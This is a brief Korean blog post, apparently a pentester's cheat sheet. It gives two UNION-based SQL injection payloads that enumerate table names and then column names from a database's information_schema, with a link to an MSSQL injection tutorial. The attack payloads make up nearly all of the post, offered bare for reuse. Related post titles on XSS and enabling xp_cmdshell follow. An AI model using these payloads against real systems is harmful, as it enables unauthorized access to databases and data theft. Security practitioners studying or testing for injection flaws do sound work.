Table 조회

and 1=2 union select 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from information_schema.tables--


Column 조회

and 1=2 union select 1,2,3,4,column_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from information_schema.columns where table_name='table'--


http://raijee1337.blogspot.com/2015/07/mssql-union-based-injection-step-by.html

저작자표시 비영리

'Web' 카테고리의 다른 글

marquee onstart xss & XSS 기법  (0) 2019.05.10
주요 Editor 샘플페이지 및 취약점 발생경로  (4) 2018.12.03
xp_cmdshell 활성화 쿼리  (1) 2018.10.01
MSSQL Limit 기능 구현  (0) 2018.10.01
Oracle Error based injection  (0) 2018.08.23

+ Recent posts

티스토리툴바